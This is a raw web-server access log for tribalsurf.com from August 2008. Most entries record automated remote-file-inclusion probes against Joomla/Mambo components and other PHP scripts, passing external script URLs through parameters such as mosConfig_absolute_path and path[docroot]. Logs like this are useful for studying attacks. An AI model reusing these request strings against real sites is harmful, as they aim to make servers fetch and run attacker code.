89.218.85.18 - - [31/Aug/2008:17:00:37 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:17:00:37 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:17:00:38 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:17:01:59 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:17:02:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:17:02:04 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:43 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:44 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
213.113.108.116 - - [31/Aug/2008:17:03:44 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:17:05:44 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:17:05:44 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:17:05:44 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.55.209.142 - - [31/Aug/2008:17:11:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.tribalsurf.com"
65.55.209.142 - - [31/Aug/2008:17:11:55 -0700] "GET /testingrocknwaves/?N=A HTTP/1.1" 200 548 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.tribalsurf.com"
75.0.18.81 - - [31/Aug/2008:17:12:22 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.tribalsurf.com"
75.0.18.81 - - [31/Aug/2008:17:12:23 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:17:16:56 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "tribalsurf.com"
207.210.89.58 - - [31/Aug/2008:17:20:51 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
207.210.89.58 - - [31/Aug/2008:17:20:51 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.811" "www.tribalsurf.com"
207.210.89.58 - - [31/Aug/2008:17:20:51 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.811" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:17:22:14 -0700] "GET /logs//?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:17:22:14 -0700] "GET //?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:17:22:19 -0700] "GET /logs/access.log//?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:17:22:53 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:17:23:01 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:17:23:01 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:17:30:33 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:17:30:33 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:17:30:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.tribalsurf.com"
67.212.173.42 - - [31/Aug/2008:17:31:48 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
67.212.173.42 - - [31/Aug/2008:17:31:48 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1331 "-" "libwww-perl/5.811" "www.tribalsurf.com"
67.212.173.42 - - [31/Aug/2008:17:31:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.811" "www.tribalsurf.com"
66.216.26.101 - - [31/Aug/2008:17:33:06 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.216.26.101 - - [31/Aug/2008:17:33:06 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1331 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.216.26.101 - - [31/Aug/2008:17:33:06 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.185.168.98 - - [31/Aug/2008:17:33:52 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.185.168.98 - - [31/Aug/2008:17:33:52 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1331 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.185.168.98 - - [31/Aug/2008:17:33:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.tribalsurf.com"
84.21.71.133 - - [31/Aug/2008:17:39:01 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
84.21.71.133 - - [31/Aug/2008:17:39:01 -0700] "GET /logs//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.tribalsurf.com"
84.21.71.133 - - [31/Aug/2008:17:39:01 -0700] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
84.241.0.10 - - [31/Aug/2008:17:51:18 -0700] "GET /logs/access.log//errors.php?error=http://www.shkupi.nu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
84.241.0.10 - - [31/Aug/2008:17:51:18 -0700] "GET /logs//errors.php?error=http://www.shkupi.nu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:18:08:02 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:18:08:02 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
124.217.231.243 - - [31/Aug/2008:18:09:48 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
124.217.231.243 - - [31/Aug/2008:18:09:48 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
124.217.231.243 - - [31/Aug/2008:18:09:48 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:18:11:30 -0700] "GET /logs/access_080707.log//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:18:11:35 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.50.106.226 - - [31/Aug/2008:18:11:35 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:12:12 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:12:12 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:12:12 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
203.70.234.97 - - [31/Aug/2008:18:19:39 -0700] "GET /testingrocknwaves/ HTTP/1.0" 200 532 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.tribalsurf.com"
203.70.234.97 - - [31/Aug/2008:18:19:40 -0700] "GET /surfclinics/ HTTP/1.0" 200 520 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.tribalsurf.com"
195.199.190.37 - - [31/Aug/2008:18:19:55 -0700] "GET //index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:20:19 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:20:20 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:20:20 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:31:02 -0700] "GET /logs/access_080707.log//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:31:02 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
204.15.10.22 - - [31/Aug/2008:18:31:02 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
195.199.190.37 - - [31/Aug/2008:18:32:21 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
195.199.190.37 - - [31/Aug/2008:18:32:22 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:18:34:35 -0700] "GET /logs/access.log/config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:35:33 -0700] "GET /logs/access.log/home.php?index=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:35:34 -0700] "GET /home.php?index=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:35:36 -0700] "GET /logs/home.php?index=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:18:36:33 -0700] "GET /logs/access.log/config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:18:36:33 -0700] "GET /config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:18:36:33 -0700] "GET /logs/config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:18:37:11 -0700] "GET /logs/access_080707.log/config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:18:39:25 -0700] "GET /logs/access_080707.log/config.php?path_to_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:41:01 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:41:01 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:41:01 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:50:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:50:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:50:50 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:50:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:51:02 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:51:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:51:55 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:51:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:52:07 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:52:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:18:52:07 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:52:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:52:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:54:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:54:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:55:55 -0700] "GET /logs/access_080707.log//include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:55:57 -0700] "GET //include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:18:55:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
200.11.67.242 - - [31/Aug/2008:18:57:15 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:18:57:30 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:18:57:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:18:57:30 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.57.163.125 - - [31/Aug/2008:18:57:36 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
202.57.163.125 - - [31/Aug/2008:18:57:37 -0700] "GET ///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
202.57.163.125 - - [31/Aug/2008:18:57:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:57:43 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:18:57:44 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:17 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:18 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:18 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:18 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:19 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:22 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:23 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.6.251.5 - - [31/Aug/2008:18:58:23 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:18:59:27 -0700] "GET /logs//includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:18:59:27 -0700] "GET //includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:18:59:32 -0700] "GET /logs/access.log//includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:18:59:36 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
